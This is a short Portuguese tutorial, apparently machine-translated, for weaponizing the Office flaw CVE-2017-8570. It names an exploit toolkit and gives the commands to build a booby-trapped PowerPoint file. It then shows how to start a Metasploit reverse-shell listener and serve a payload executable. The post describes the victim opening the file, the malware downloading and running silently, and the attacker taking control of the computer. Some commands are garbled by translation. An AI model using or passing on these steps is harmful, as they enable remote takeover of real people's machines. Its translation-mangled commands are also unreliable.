O que precisamos:
1) Kali linux

2) Metasploit

3) Conhecimento dos comandos básicos do Linux Vamos

começar: 1) Primeiro, baixe o próprio git clone
exploit - tezukanice / Office8570: CVE20178570 2) Vá para a pasta baixada cd Office8570 3) Para gerar com sucesso um arquivo ppsx , você precisa criar uma pasta “template” no templates Office8570 mkdir e transferir o arquivo template.ppsx para ela (está localizado na pasta que baixamos) cp template.ppsx template/ 4) Half bem feito!! Em seguida, você precisa criar o próprio arquivo .ppsx ⤋⤋⤋ ( o nome da apresentação muda aqui ) python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u

http://SeuIP/logo.doc

5) Fizemos um arquivo de apresentação, mas precisamos costurar

nele um vírus (payload) 6) Inicie o ouvinte. Ele relata e assume o controle quando a vítima abre o arquivo msfconsole -x “use multi/handler; definir PAYLOAD windows/meterpreter/reverse_tcp; definir LHOST YourIP; definir LPORT 4444; run” 6) O vírus e o listener estão prontos. Você precisa executar o próprio servidor de exploração python cve-2017-8570_toolkit.py -M exp -e

http://SeuIP/shell.exe
-l /tmp/shell.exe

Como funciona:
Quando a vítima abre a apresentação, seu vírus começa a baixar silenciosamente e, em seguida, inicia-o automaticamente. Quando isso acontecer, a sessão será aberta e você poderá controlar o computador da vítima.